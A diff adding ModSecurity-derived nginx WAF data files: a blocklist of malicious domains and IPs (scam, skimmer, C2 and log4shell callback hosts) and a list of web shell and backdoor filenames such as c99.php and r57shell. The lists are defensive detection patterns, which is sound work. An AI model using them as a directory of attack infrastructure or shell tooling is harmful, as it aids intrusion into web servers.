+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE   
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR   
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF   
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS   
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN   
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)   
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF   
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+104.27.148.147/
+108.179.234.91/
+109.234.35.90/
+116.125.126.111/
+118.130.191.213/
+119.75.205.178/
+125.161.39.94/
+1268vip.com/
+173.15.111.29/
+173.236.65.24/
+177.11.48.237/
+180.210.205.209/
+185.44.105.7/
+190.196.132.14/
+195.154.165.135/
+195.154.73.79/
+195.225.34.101/
+198.101.206.138/
+200.49.148.95/
+200.98.146.61/
+200.98.164.3/
+201.245.129.42/
+202.150.216.211/
+208.115.220.82/
+210.1.60.156:2082/
+212.7.217.117/
+213.246.61.125:2082/
+213.5.177.196/
+217.218.225.2:2082/
+37.46.133.10/
+46.4.121.189/
+62.210.92.9/
+65.61.103.76/
+66.196.254.130/
+6thavenueelectronics.net/
+77.65.23.211/
+78.46.100.45/
+78.46.49.57:21502/
+.80systemerroralertcode22.com/
+82.196.10.226/
+86.55.140.203/
+89.248.172.139/
+919vn.com/
+94.199.51.7/
+99.153.29.240/
+aarc.dz/
+ableoccassion.com/
+absolutelycute.net/
+academicotogas.com.br/
+.actions.ro/
+.actualitatea-romaneasca.ro/
+adbirdie.com/
+ad.dipad.biz/
+.adk2x.com/
+admpi.com.br/
+adobesecurupdate.com/
+.advantagewg.com/
+aefgh.org/
+aegv.pt/
+aeronager.com/
+.aimeezingdaycare.com/
+.airmax90.party/
+.albumpalavra.com.br/
+alert-sa.com/
+.alhikmahsby.com/
+allfilesdownload.us/
+almadanews.com.br/
+almamatez.com/
+ampm2u.pw/
+.analprolap.se/
+andopol.pl/
+androidepisode.com/
+angelhelper.co.kr/
+.angelsagency.com/
+.anilorak.com/
+antichat.ru/
+antoniopastor.com.ar/
+anything2u2.org/
+anythingforwp.com/
+aodaikhoanguyen.com/
+aplikacii.com/
+apollo5go.com/
+apple.gifts-centers.com/
+applehelp.net/
+aquariusandaquarius.com/
+.arabrelevance.com/
+arestoscosmeticos.com.br/
+asianon.co/
+asianons.net/
+.attack.com/
+auction.pennytrail.com/
+.audytor.conlex.pl/
+austeal.com/
+avanti-pizza.ch/
+avarsky.ru/
+.avsbackup.com/
+awesome4wp.com/
+awfwow.net/
+babycaleb.axspace.com/
+badglorry.in/
+badwolff.pw/
+.barba2.com.ar/
+barra.uol.com.br/
+.batoma.com.au/
+.bcvziy.com/
+bestbooksfiles.com/
+bestnulledscripts.com/
+bethelphotoworks.com/
+betube.co.uk/
+bimlolgroup.in/
+.binkleyapples.com/
+biofoodey.org/
+.blackgreenfoods.com/
+blackmorgana.com/
+blacknite.eu/
+blacktitan.org/
+.blackwellbusiness.com/
+.blankchair.com/
+bleury.fr/
+blizfone.cf/
+blogger.comxvas.tk/
+blogg.tommi.nu/
+bokoinchina.com/
+.bridgenote.com/
+bringletorn.biz/
+bubblebanks.com/
+bukirda.com/
+bvbbo.nl/
+by-scr43z1.com/
+c99txt.net/
+.cafebacon.com/
+.calagaz.net/
+callmenauw.net/
+canadaimmigration-visa.com/
+canvila.org/
+carandfly.net/
+carandflys.info/
+carnk.com/
+carruess.org/
+carterinfect.alwaysdata.net/
+.carunalnik.org/
+casefollowup.com/
+.cathyerdmann.com/
+cbsfree.com/
+ccteam.ru/
+.cderlearn.com/
+.cdlvilavelha.com.br/
+.cgilvicenza.it/
+chairguy.pw/
+chansteel.in/
+.chantier-allemand.com/
+checkournewsoft.com/
+.cheer.hk/
+chinese-foods.info/
+chinesemaster.biz/
+chinesemasters.pw/
+.ciderspace.ch/
+.cigdemsporkulubu.com/
+.cirend.com.ar/
+cirter.com/
+clarkcopperheadgaskets.com/
+cleanmsgs.com/
+clevervc.com/
+com-00-northamerica.com/
+com-e84.net/
+comerciodeitapolis.com.br/
+compraourocard.web563.kinghost.net/
+computersystemalert.com/
+.confeitariabombocado.com.br/
+conopizzavenezuela.com/
+constructioncalcs.com/
+contactpchelp.com/
+content-into-cash.com/
+cooperdup.mx/
+copa-armada.clubnaval.mil.ec/
+couponsonakeychain.com/
+cpanel.host-ed.net/
+cprnash.com/
+.creativebooster.ro/
+crediyasa.com/
+crime-style.org/
+csi-tavira.com/
+cti-tech.cn/
+cuttscan.org/
+d1.flnet.org/
+dailynulled.com/
+damocom.net/
+danbarton.in/
+daramusic.org/
+daramusics.com/
+dayddb.com/
+dayoo.co/
+deadmary.biz/
+default7.com/
+.deportesenfotos.com/
+deutz-marine.com/
+.dgodns.net/
+diagranti.com/
+diamloisirs.infoconnect.re/
+didus.org/
+.diendanceo.vn/
+.dionmorrow.com/
+distinctfestive.com/
+divisits.com/
+dmmjav.com/
+doa.go.th/
+domaincop247.com/
+domesistance.com/
+domitian.net/
+dondom.co/
+donutjs.com/
+download.goobzo.com/
+dragoncrew.org/
+dreamknow.net/
+drummercoo.info/
+d-s.co.kr/
+dudelman.biz/
+dudelmans.info/
+dundaroil.basgec.org/
+duringsha.com/
+dynamicxor.com/
+easibilitary.com/
+editprod.waterfilter.in.ua/
+eezdownloads.com/
+efax.pfdregistry.net/
+efraincolombo.com.ar/
+eidk.hopto.org/
+eikonsmedia.com/
+ekitap.in/
+elearning.sace.it/
+electradev.info/
+electronicfrontierfoundation.org/
+.elian.asia.lk/
+.eliteteamsite.com/
+.el-manhal.com/
+.elmillero.us/
+emilyg.info/
+enamorarlas.com/
+.encostadolago.com.br/
+envymagazine.ca/
+.envytations.net/
+ergofilling.com/
+.ergunpneus.be/
+esd.nzs.com.br/
+eshop.earmy.cz/
+.esmacu.org/
+esportal.in/
+esportals.biz/
+etymologi.in/
+eurolips.in/
+.euroquipe.ie/
+eurosystems.it/
+evolution-store.net/
+fabulousall.net/
+.faret.cn/
+fatrats.in/
+fbguns.pw/
+.fefnjefb.in/
+fewo-appartement-siegen.de/
+fighter-writer.org/
+filesmonster.porn/
+.fileversion.net/
+fimfoo.net/
+findoki.net/
+.fing.usach.cl/
+firstpagesearch.com.au/
+.fisheries.go.th/
+.fisiopremium.com.br/
+fixpc99.com/
+flashpotdesigns.com/
+florenses.xyz/
+.fmdevelopersnetwork.com/
+fmdons.com/
+fmfn.in/
+fmfoo.in/
+foltimaks.biz/
+.fonarick.com/
+foodeyo.biz/
+foodrumer.com/
+foodrumers.co/
+foolazylady.pw/
+foosample.info/
+foosamples.com/
+.fordfixer.net/
+forestaunicorni.altervista.org/
+fotogirl.ca/
+fraudsteel.com/
+free3dprint.cf/
+freeapart.in/
+freeaparts.org/
+freeforwp.com/
+.free-iphone6s.com/
+.freelotto.com/
+freemiumscripts.com/
+froggerbobber.com/
+frogprogs.biz/
+.fservers.net/
+fsquaredmedia.com/
+ftp.90plan.ovh.net/
+ftp.freehostia.com/
+ftp.service-web-host.pagebr.com/
+ftp.uhserver.com/
+ftp.volleyclubmaconnais.fr/
+ftp.vveijsden.nl/
+full-comandos.com/
+funpixhawaii.com/
+futurecomtechnologies.com/
+g-analytics.biz/
+gay-file.com/
+gazetashqiptareonline.com/
+.geekgadget.net/
+geekube.com/
+gencan.in/
+genejtrack.com/
+generalop.in/
+generalops.biz/
+.gessorosarinho.com.br/
+getnulledscripts.com/
+.getonnow.net/
+gezidotojyk.org/
+.gezondtea.com/
+.gfx-loop.com/
+ggjghhfhfh.com/
+.ghanachambertakoradi.org/
+giveourlife.org/
+glendalehills.am/
+glentools.in/
+.glory-korea.com/
+gngoo.com/
+goldcashin.net/
+.goodigood.com/
+goodoo.biz/
+.gorenergo.com/
+graphizma.com/
+.grasp-press.co.uk/
+greataudiosdownloads.com/
+greatvideosdownloads.com/
+groundrealty.co.in/
+.groupe-rouquette.com/
+guitarland.in/
+guitarlands.biz/
+guruincsite.com/
+.gymelitys.ca/
+.gynecologicalendocrinology.org/
+.gyomainyaralo.hu/
+h4cker.tr/
+hadyagifts.com/
+hamstelbeer.biz/
+hantersid.biz/
+hanterwall.pw/
+.harrisoncarlos.net/
+hashcrack.com/
+hashcracking.info/
+hbo4free.info/
+.hcchb.gov.tw/
+.heliconsystems.com/
+heliomros.com/
+.hidayah.edu.my/
+higrees.in/
+holegirl.eclub.lv/
+hollahup.me/
+.holleyberry.com/
+.honbu.fi/
+honeybun.in/
+horskypramen.cz/
+hortwava.com/
+hotlogupdate.com/
+http:/404-errors.info/
+huntergil.biz/
+.i4rent.de/
+.ickray.com/
+.ifriqiyah-site.com/
+iglesembalagens.com.br/
+ignews.co/
+igooglecache.com/
+images.imagenetcom.com/
+inctwo.com/
+.inesmariaalcalde.com/
+infopromo.biz/
+inmessagealert.com/
+insta.reduct.ru/
+interstech.info/
+iosalert-error.com/
+iosclean.com/
+ios.crashreport.info/
+ios-errors.com/
+iossecurityalert.com/
+iscanth.org/
+.islandvillasbali.com/
+.istanbuldenizotobusu.com/
+izplace.com/
+.jaintv.com/
+.jasa.adv.br/
+javrip.net/
+.jeetatl.com/
+.jejucasa.com/
+jewelrydna.com/
+.jjctv.com/
+.jkladesign.com/
+joioiskioeriyyskwkdwjsdfewis.land.ru/
+joncon.in/
+.josianeguss.com/
+.jpetrusbar.com/
+jquery-code.su/
+jquuery.com/
+jsacademys.net/
+juicycouture.com.au/
+julianus.net/
+.k7-gd.com/
+kadjisquare.com/
+kajtus.webd.pl/
+.kantorrico.pl/
+kelmanstar.biz/
+kereny.ro/
+kesi.granc.hu/
+k-fish-ka.ru/
+kilmarnockbaptist.org/
+.kirimcara.com/
+kittsburg.com/
+kmbc-thai.com/
+.kolaka.gr/
+kolmen.org/
+kolmens.com/
+konstantine.ru/
+.kontjokenthel.com/
+koouse.pw/
+kortech.cn/
+krasnayadama.info/
+kreotceonite.com/
+.kriko-car.hu/
+.ksma.or.kr/
+.kunjungiindonesia.com/
+.kyra.ae/
+ladiesdehaan.be/
+.lanmanserver.com/
+largelicacy.com/
+laskeygen.net/
+laspeores.com.ar/
+layfoster.net/
+.ldsa.ca/
+lennartobdam.nl/
+lightingcentre.co.uk/
+likebugs.in/
+.limitlessnewworlds.com/
+lincomers.com/
+lincorporato.com/
+listen2u.info/
+littjohnwilhap.ru/
+.logitec.se/
+longlifeweld.com.my/
+.lopburicoop.com/
+.lostbrundageit.com/
+losticloud.6te.net/
+macattention.in/
+mac-health-support.com/
+mac-online-support.com/
+macrinus.net/
+mac-security.com/
+madleets.com/
+maika-pujales.es/
+maisconquiste.com/
+maisurpreenda.com/
+maraca.hut2.ru/
+.maragusa.com.br/
+marcelotaiette.sites.uol.com.br/
+martinkroesen.nl/
+marzs.ru/
+masterprotect.ir/
+mathlow.co/
+mawnew.com/
+mawnews.in/
+.mayallgogogo.com/
+mbrowserstats.com/
+mdplaza.co.id/
+mediasearchdirect.com/
+.megalolik.com/
+.meliston.com/
+menko.co/
+menotepoer.com/
+.menyudnya.com/
+mermodynamic.com/
+mfileshare.com/
+microsoft-securety.com/
+micrrosoft.net/
+mightywordpress.com/
+milahoney.org/
+milkaxe.biz/
+miniboxmaysa.com/
+.miuzu.com/
+mobileappsmpire.com/
+.mobilunion.de/
+.mobmusik.com/
+mo-fa.etowns.org/
+moneycot.org/
+moongreen.info/
+morenewmedianow.com/
+mostelpay.com/
+.motorgrup.ro/
+mountil.com/
+movemorey.in/
+mp3raagam.net/
+msdnscripts.com/
+.mslcomputers.com.au/
+mtvboard.biz/
+mtvboards.com/
+mtvfree.com/
+mtvnye.com/
+mukasore.xyz/
+mundo.busca.uol.com.br/
+.mundo-nipo.com/
+.muniquilicura.cl/
+.muslimrulers.com/
+.mutiarabangsa.sch.id/
+.mvctecnologia.com.br/
+mydigitalfinderone.com/
+.myhanbando.com/
+mymodule.waterfilter.in.ua/
+nanogrades.net/
+.ncprd.org.ng/
+.nep.go.th/
+newfastmediasearcher.com/
+newtester2012.atspace.co.uk/
+nezlobudnya.com/
+nikonographer.ru/
+ninoceram.ir/
+nkpage.info/
+nkpages.net/
+.nodong119.co.kr/
+nonsensefood.org/
+novotempolivraria.com.br/
+nuday.net/
+nudays.biz/
+nulledirectory.com/
+nulledlistings.com/
+nullednet.com/
+nulledstylez.com/
+nulledwp.com/
+nullit.net/
+nutragate.com/
+.oglcommunity.de/
+one2shoppee.com/
+onesource.com.my/
+onlinebooksfiles.com/
+online-mac-issues.com/
+onlinestore.az/
+orgfoo.com/
+orroa.org/
+.ortodontiacorretiva.com.br/
+.otherhumanerrors.com/
+outletginess.net/
+oya2.net/
+oz.publikum.sk/
+.ozsportsbikes.com/
+pader-g.org/
+painreliefsite.com/
+.pakning.net/
+.panhandleflyers.com/
+paperplanet.co/
+paperplanets.info/
+paperplanez.info/
+.parallell.ru/
+.pasukanjihad.com/
+pbdewilgen.nl/
+pcassists.info/
+pc-errors-notice-1a.com/
+pcsafe.us/
+.pcts.or.kr/
+.pdinahar.com/
+.perkinsbraden.com/
+phtmllaudanskis.chat.ru/
+pic2take.pw/
+pic2takes.biz/
+pointacademy.kr/
+pointern.com/
+pokerchips.t35.com/
+pollackandball.com/
+.pomegranateatthemarket.net/
+portaldasmaquinas.net/
+portaldoheavymetal.org/
+private.directinvesting.com/
+privatepaste.com/
+privatepracticesecrets.com/
+privc0de.com/
+prodajpricu.com/
+progman.in/
+progmans.co/
+.programasm.com/
+programasm.com/
+prolinkirc.org/
+promediasearch.com/
+.prototypeevolution.com/
+psykopatico.altervista.org/
+.pueblotricolor.com/
+pwn.nixon-security.se/
+qbfdq.com/
+qualityhost.in/
+quatlam.com/
+questart.com.pl/
+quoteboll.biz/
+r57.gen.tr/
+.radioretro.com.br/
+ramakit.biz/
+.ratu-bigsale.com/
+raymybe.in/
+realanalytics.pro/
+.realdanube.sk/
+realstatistics.info/
+realstatistics.pro/
+recognizereality.com/
+remotecomputertechhelp.info/
+.rerickey.com/
+revistaelshaddai.com/
+.rgsnewcastle.co.uk/
+.riffserver.com/
+.riftenterprises.com/
+.rinconluismiguel.com.ar/
+ringostar.in/
+rishtofish.pw/
+ritsoperrol.ru/
+roadsiderescue.com.au/
+.rollemont.com/
+.rudyprojectchina.com/
+.ryko89.com/
+safari-net-help.com/
+.sakulejo.com.br/
+.salonladym.ro/
+sameyouto.com/
+saveclip.net/
+scamadviser.com/
+sceniceyou.pw/
+.scoalamirceaeliadepitesti.ro/
+.scratchstudio.org/
+scriptb.com/
+security.belayadama.info/
+securityupdatealert.com/
+securitywarns.com/
+seektoexplore.com/
+seikatsuichiba.com/
+seo-moz.com/
+seo-position-report.net/
+.seoulpainclinic.com/
+.seranteshotel.com.br/
+.serextprevencion.com/
+services.paypai.com/
+sh3ll.org/
+shaunandpaige.com/
+.showgirls.com.br/
+sikum.com/
+.silverbell.org/
+silverbell.org/
+singletwo.net/
+siteanalytics.pro/
+sitenko.biz/
+.sklep.klichowicz.pl/
+slaveralled.com/
+sleepyvillage.ca/
+slimflicker.in/
+slmseguros.es/
+smung.spo.moph.go.th/
+snap-u.com/
+.soccerageclub.com/
+.sokut.ir/
+.sonhoencantadonet.com/
+.space-cs.com/
+spearanoia.org/
+.spgrepair.ca/
+sponsistorm.com/
+sportcen.com/
+sportscen.org/
+.spygrup.org/
+stablehost.us/
+.star-games.be/
+starmediasearcher.com/
+stedentrip-europa-aanbieding.nl/
+stedentrips-aanbieding.nl/
+steinteppiche.ch/
+.stencel.co.uk/
+stonerock.in/
+stonerocks.net/
+stranges.info/
+stranieistor.com/
+studentwine.co.uk/
+.studiolegalemanzi.com/
+suppornet.ca/
+support-firewall.info/
+support-pc-now.com/
+supports.link/
+.suroot.com/
+surpreendase.net/
+system-connect.com/
+system-logs.info/
+systemsecurities.info/
+systemsecurityalert.com/
+tablemaster.in/
+tablemasters.org/
+tailines.com/
+talool.net/
+taxiairportpop.com/
+.technologyventures.info/
+techsupport247.org/
+.tecnilibro.com/
+.tecnopes.com.ar/
+.tecnopoly.it/
+.temporel-voyance.com/
+termrock.com/
+termrock.in/
+test0.com/
+test246.com/
+test557.com/
+test5.xyz/
+testadordesit.com/
+tester2012.h19.ru/
+.theatre-lumiere.com/
+the-unforgiven.org/
+thevintagebar.co.uk/
+thexorandor.in/
+throughluk.net/
+.thurz-x.net/
+tioandino.com/
+tipesh.biz/
+.tkfisher.org.tw/
+.tlcdf.com/
+.todo-comercial.com.ar/
+.tonyveiculos.com.br/
+.too-oop.com/
+.topinstructoriauto.ro/
+topnulledownload.com/
+totustuus.or.kr/
+trafficanalytics.online/
+.trafficsyphon.com/
+traffictrade.life/
+trailmorey.com/
+.transmetro.gov.co/
+.transposagenbio.com/
+travelsans.pw/
+traveltrainer.info/
+trimtoroot.com/
+tshirtsforsale.co.za/
+.tsogcherbalcare.com/
+tunegrotto.com/
+turnfest.im/
+.turuzzonatale.it/
+twomath.biz/
+.ubat-ff.com/
+.ubertom.com/
+.uccl-sa.com/
+uganonym.com/
+.uniaogaucha.org/
+uniglader.biz/
+universonutri.com.br/
+.upandrunnin.net/
+.update4ever.xyz/
+urlmediafiles.com/
+validation.co.kr/
+.vebiromania.ro/
+.vesti-ua.net/
+video-vk.ru/
+villagesun.in/
+vipsbr.50webs.com/
+virusprotectionteam.com/
+virusscanalert.com/
+virus-scanner.info/
+.visaginas.org/
+vivalites.biz/
+.vmsupply.com/
+vmsupply.com/
+voca.or.kr/
+void.ru/
+voudevisa.1gb.ru/
+.w0135cyber.net/
+wagrain-jugendferien.at/
+wardie.dhhsptsa.net/
+.weberei-brey.de/
+web-esi.com/
+webhalf.info/
+web-plasa.com/
+.webproof123.hdfree.com.br/
+websiteacademy.biz/
+websitesdesignaffordable.com/
+.websnatchers.ro/
+webstatistics.pro/
+.welawfl.com/
+wendami.me/
+wikiqedia.biz/
+wikiqedias.com/
+wilcarobbe.com/
+will2012.atspace.co.uk/
+windowsdesk.net/
+.winjeprijs.com/
+wonderfails.net/
+wordpresscore.com/
+wordprssapi.com/
+worldbooksdownloads.com/
+worldcut.biz/
+worldcute.biz/
+worldofhosting.com/
+wp-blogstats.com/
+wp-nulled.com/
+.wushu.org.ge/
+wutangclan.ru/
+.wuyoubaomu.net/
+x01.mirc.com.gr/
+.xbox360-kinect.nu/
+xenonstyles.net/
+xgps150.dualav.com/
+xiaoguizi.gotgeeks.com/
+xn--pn3b8j57geyi6c.kr/
+xreyuk.co.uk/
+.yetaotao.com/
+y.healing-our-deepest-wounds.com/
+yoctotemplates.com/
+.youfuze.com/
+yourfreemediadownloads.com/
+yournetmediastore.com/
+yourpromptdownloader.com/
+yoursoftwareplace.com/
+zarafan.org/
+.zeroredirect2.com/
+zimlooks.com/
+zolokit.biz/
+zoneoflive.com/
+raw.githubusercontent.com/xmrstudio/
+setforconfigplease.com/
+getmyfreetraffic.com/
+clevertrafficincome.com/
+hellofromhony.org/
+notifymepush.info/
+pushmeandtouchme.info/
+recaptcha-in.pw/
+destroyforme.com/
+.hognoob.se/
+fid.hognoob.se/
+requestbit.com/
+93.158.203.156/
+requestbit.com/
+requestegg.com/
+requestmob.com/
+99request.com/
+101request.com/
+request101.com/
+drrequest.com/
+rerequest.com/
+tryrequest.com/
+requesttip.com/
+requesthd.com/
+hdrequest.com/
+requestbee.com/
+itenvoirtech.com/
+javayousave.com/
+mageuserland.com/
+pollocart.com/
+productjstech.com/
+succescripts.com/
+upgradenstore.com/
+straproduct.com/
+userlandit.com/
+openyourass.club/
+collectfasttracks.com/
+destinyfernandi.com/
+digestcolect.com/
+stivenfernando.com/
+trackstatisticsss.com/
+traffictrade.life/
+yourservice.live/
+adsnet.work/
+cdn-filestore.com/
+nativeredir.tk/
+localhostnametable.com/
+shellx.org/
+kostunivo.com/
+chishir.com/
+mangoclone.com/
+onixcellent.com/
+digitalcollege.org/
+freescanonline.com/
+deftsecurity.com/
+thedoccloud.com/
+virtualdataserver.com/
+incomeupdate.com/
+zupertech.com/
+databasegalore.com/
+panhardware.com/
+avsvmcloud.com/
+kubecloud.com/
+seobundlekit.com/
+solartrackingsystem.net/
+virtualwebdata.com/
+supernetforme.com/
+superwebbysearch.com/
+.dontkinhooot.tw/
+wibuheker.com/
+23.106.253.151/
+185.213.209.151/
+canarytokens.com/
+log4shell.huntress.com/
+jswl.jdaili.xyz/
+209.141.33.141/
+cheatmod.org/
diff --git a/nginx-waf/malware_names.txt b/nginx-waf/malware_names.txt
new file mode 100644
index 0000000..3ed4c51
--- /dev/null
+++ b/nginx-waf/malware_names.txt
@@ -0,0 +1,443 @@
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2013-2021 by Atomic Corpate Industries Inc. , all rights reserved.
+# Copyright 2005-2013 by Prometheus Global, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is 
+# prohibited unless prior written permission is obtained from the 
+# copyright holder. 
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS   
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE   
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE   
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE   
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR   
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF   
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS   
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN   
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)   
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF   
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+0d4y.php
+0day.gif
+0day.jpg
+0day.php
+0wn3d.php
+0wned.php
+/11.php
+/1ndex.php
+/22419126.php
+24l9khjt.php
+/3xp.php
+404.php.jpg
+/70be.php
+/70bex.php
+/80cams.php
+/90sec.php
+ahihi.aspx
+/allnet.jpg
+allsoft.pl
+/alwso.php
+/anak.txt
+antichat.php
+antisecshell
+antisux.php
+/api/getn.php
+appfileexplorer
+/arab.indonesia.php
+/asm/xyz/xyz/
+autoshell.asp
+autoshell.txt
+/azenv.php
+b374k-2.8.php
+backdoor.php
+/bad.php
+/batuk.php
+/bbb.php
+bdotw44shell
+/bhkt.php
+/bkht.php
+/blackmuscats
+blackunix.php
+/blekt.php
+/borong.php
+/botshell.jpg
+/bshxgj.
+/bt.php
+/burung.php
+/byroe.jpg
+/byroe.php
+c100.php
+c100.txt
+c99.php
+c99.txt
+cache/cachee.php
+cache/css.php
+cache.uniq_04793.php
+/canz.php
+ccccc.php
+cfexec.cfm
+.cgi?8
+cgi-telnet
+cgitelnet
+/chinta.txt
+cih.php
+/cilik.php
+cjpju91639.txt
+/cliti.php
+/clk.php?id=
+cmd2.asp
+cmd2.txt
+cmd.asp
+cmd-asp-5.1.asp
+cmdasp.asp
+cmd.dat
+cmdjsp.jsp
+/cmd.php
+cmdshell
+/cmdtvul.txt
+cmdtvul.txt
+/cmd.txt
+/cocok.txt
+/cok.php
+colors/blue/engine_functions.php
+command0.php
+command0.txt
+/command.php
+/compiled/fwrite.php
+conf_4cn.php
+conf_7t9.php
+/confgic.php
+/confgi.php
+Configss.php
+/confi.php
+conf_m46.php
+content/engine/engine_config.php
+coreunix.php
+/count24.php
+cpanel_cracker
+/c.php
+cr0t.php
+crewid.txt
+crypt/cipher/view.php
+cse.dat
+cse.php
+custom-content-type-manager/auto-update.php
+cx529.php
+cx529.txt
+/cxmqk.php
+/cybercrime.php
+cyberz
+/daster.jpg
+/ddos.txt
+ddxdx.php
+/diam.txt
+diaosi.asp
+/dm.php
+/door.php
+/dor/dor.php
+/doyok.php
+e7xue.php
+efd7a0.php
+elgass.cin
+elrekt.php
+engine/engine_restore.php
+enigma2.php
+equiangle.pl
+/exposedbotnets.txt
+/fdgq.php
+fdgq.php 
+/firefoxz.php
+/fonts_icon/15/icons.php
+/fonts_icon/jg4/coder.php
+fr33.php
+fx29id
+fx29sh
+/ganteng.gif
+.get.php
+gh0st.php
+google-assist.php
+go.php.txt
+gopni3g/story.php
+haozk.asp
+hardfind.php
+hardfork.php
+hijack.php
+/hlep.php
+horind.php
+hospedagen.txt
+/hphui.php
+htacess.php
+iblis.htm
+/icons/brt/t.php
+/icons/kntl/img.php
+/ico/search.php
+id1.txt
+/id3.txt
+/idl.txt
+id-rfi.txt
+/idscan
+/id.txt
+idx2.txt
+/idx.txt
+idxx.txt
+/images/file.php5
+imageshell.ph
+images/Image/root
+/images/stories/story.php
+/inc/admin/cached.jpg
+includes/cctm_communicator.php
+/includes/joomla/database/database.php
+includes/sysdata.php
+indeeex.php
+/indek.php
+/indeks.php
+/indice.pl
+Indishell
+indivision.pl
+indoshell.php
+/indx.php
+/inedx.php
+injectorthimthumb.php
+injectortimthumb.php
+/injektor.php
+/injek.txt
+_input_1_
+_input_2_
+_input_3_
+_input__test
+_input_test
+jackrosejump_la
+/jahat.php
+/jgxfq.php
+joomla_verkap.php
+joomla_verzkd.php
+js/bb.php
+js/jquery.min.php
+jsp-reverse.jsp
+k4l0nk.php
+kanjut.txt
+khan.php
+lala.php
+/laravel.php
+l_backuptoster
+/lc_9.php
+lib/fuck-the-usa.txt
+/libraries/joomla/jmail.php
+/libraries/lol.php
+linuxdaybot
+/lnnxy.php
+/lobo-guara.txt
+localroot.php
+locus7shell
+m3ksi.php
+/mct.php
+metri.php
+mini-shell-backdoor
+mistless.pl
+/modar.php
+morocanz.php
+muakero.php
+muieblackcat
+/multiscan.txt
+myluph.php
+n3maplowercheck
+naskleng.php
+/neewsfeed.txt
+/newinjector.txt
+nigga.php
+own3d.php
+/owned.jpg
+/owned.php
+/ownz.txt
+p0k3r
+/parepare.txt
+payment/datacash/fwrite.php 
+/payment/payment_authorizenet_aim_3_1.php
+/payment_virtual_3D.php
+/perasaan.php
+perlcmd.cgi
+peruzak.php
+phpbb2_patch
+phpbboops
+phpbb_patch
+/phpm3.txt
+phpshell
+/phpterm
+/pithp.php
+/plus/moon.php
+/pmg.php
+Portal0000.htm
+pp104dd04a.php
+/priv.php
+/prolink.php
+proxysx.gif
+proxysx.php
+proxysx.txt
+pshyco
+pwn3d.php
+pwned.php
+qiaogua.php
+r00t.php
+/r57.
+r57-bd.txt
+r57shell
+rab3oun
+racrew.php
+/rebots.php
+/.reg.php
+/rel.php?id=
+/reno.php
+rms-script-ini
+rms-script-mu
+rms_unique_wp
+/robots.txt.php
+root~~
+.root.php
+/saerch.php
+/sangatta.txt
+scan1.0/scan/
+searchreplacedb2.php
+sec4ever.php
+securi-fix.php
+/sendme_old.txt
+sfdg2
+sh0.php
+sh1.php
+/sh2.php
+sh3.php
+sh4.php
+shell0.php
+shell1.php
+shell2.php
+shell3.php
+shell4.php
+shell5.php
+shell6.php
+shell7.php
+shell8.php
+shell9.php
+shellbot.pl
+sheller.txt
+shell.php
+/shellpvp.txt
+shelltim.php
+shell.txt
+shell_vup
+shelly.php
+shipuden.php
+/sh.php
+/sh.txt
+sinan.php
+/skin/h2.php
+som2.php
+sourceinc15.php
+sqlshell
+src/up.txt
+ssh2.php
+/.stats.php
+/stcp.php
+/stmdu.php
+/stph.php
+suckmydick.php
+suntzu
+/sux.html
+symchanger.php
+sym/root
+sys/cache.managed.php
+/taisui.php
+tangshi.php
+terminatorx-exp
+terminatorxexp
+/teste.php
+/themess.php
+therules25
+/tmp.php
+too20.
+tool20.php
+/tool25.dat
+/tool25.txt
+/toolwar.php
+trf/traf.php
+trjnx/
+/txt.php
+/udd.php
+UeXploiT
+update_l8f.php
+update_wjg.php
+/upll.php
+upload_5y9.php
+upload_rry.php
+upload_zco.php
+upnew.php
+USERNAME-WHMCS.TXT 
+uspas.txt
+utf8gat
+/viar.php
+wdsadmin/autocomplete/error.php
+/web.root
+whm-myshop.TXT 
+wiki_up/gif.php
+wiki_up/ion.php
+wiki_up/jpeg.php
+wiki_up/jpg.php
+wp-2019.php
+wp-autor.php
+wp-cache.php
+wp-conff.php
+/wp_config.txt
+wp-conns.php
+wp-content/_input_
+/wp-content/plugins/shell/
+/wp-content/plugins/wp/
+wpfootes.php
+wpfoot.php
+wp-fox.php
+wp-includes/adodb.class.php
+/wp-includes/css/modules.php
+/wp-includes/ms-files-qu.php
+wp-main.php
+WPnBr.dll
+/wp-sbb.php
+wp-security.php
+/wpstaff/wpstaff.php
+/wp-strongs/wp-strongs.php
+wp-system.php
